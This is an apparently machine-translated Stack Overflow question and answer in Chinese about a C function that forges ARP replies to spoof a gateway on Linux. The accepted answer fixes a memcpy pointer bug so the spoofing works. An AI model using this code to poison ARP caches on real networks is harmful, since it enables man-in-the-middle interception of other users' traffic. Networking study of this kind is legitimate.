我试图在linux上用c编写一个简单的arp欺骗程序(主要是为了更好地理解低级网络)。
到目前为止,我已经成功地创建了一个arp请求,并使用目标和网关的mac地址获得了arp回复,但是每当我向目标/网关发送arp回复时,我的测试计算机上的arp表都没有更新,它仍然显示正确的网关mac地址。这不是网络问题,因为kali linux arpsoof命令工作正常,arp缓存正在更新。
这是我发送伪造arp数据包的代码:

void arp_spoof(int sock, LOCAL_DATA localData, uint32_t pdst, unsigned char hwdst[6], uint32_t psrc)
{
struct ether_arp arpPacket;

struct sockaddr_ll addr = {0};
addr.sll_family = AF_PACKET;
addr.sll_ifindex = localData.interface_index;
addr.sll_halen = ETHER_ADDR_LEN;
addr.sll_protocol = htons(ETH_P_ARP);
memcpy(addr.sll_addr, &hwdst, ETHER_ADDR_LEN);  // destination physical address

// basic info about the arp packet
arpPacket.arp_hrd = htons(ARPHRD_ETHER);
arpPacket.arp_pro = htons(ETH_P_IP);
arpPacket.arp_hln = ETHER_ADDR_LEN;
arpPacket.arp_pln = sizeof(in_addr_t);
arpPacket.arp_op = htons(ARPOP_REPLY);

/*======== Resulting Structure ========

Source MAC : local mac (attacker)
Source IP  : ip of the machine attacker wants
             destination machine to believe is the source

Destination MAC : real destination physical address
Destination IP  : real destination ip address

======================================*/

// Source MAC [REAL]
memcpy(&arpPacket.arp_sha, localData.mac_address, sizeof(arpPacket.arp_sha));

// Source IP [SPOOFED / FAKE]
memcpy(&arpPacket.arp_spa, &psrc, sizeof(arpPacket.arp_spa));

// Destination MAC [REAL]
memcpy(&arpPacket.arp_tha, hwdst, sizeof(arpPacket.arp_tha));

// Destination ip [REAL]
memcpy(&arpPacket.arp_tpa, &pdst, sizeof(arpPacket.arp_tpa));

// sending the packet to the target
if (sendto(sock, &arpPacket, sizeof(arpPacket), 0, (struct sockaddr*)&addr, sizeof(addr)) == -1) {
        printf("Error arp spoofing target: ");
        PrintIpAddress(pdst);
}

最佳答案

我在密码里犯了个愚蠢的错误。
在下面一行:
memcpy(addr.sll_addr, &hwdst, ETHER_ADDR_LEN);
我把指向指针的指针作为参数&hwdst。因为hdwst已经是参数中的一个数组,所以它只需要指向第一个元素的指针。
正确的行应该是:
memcpy(addr.sll_addr, hwdst, ETHER_ADDR_LEN);

关于c - 在Linux上的C中进行arp欺骗时,目标计算机的arp缓存未更新,我们在Stack Overflow上找到一个类似的问题:https://stackoverflow.com/questions/52411199/

10-11 22:07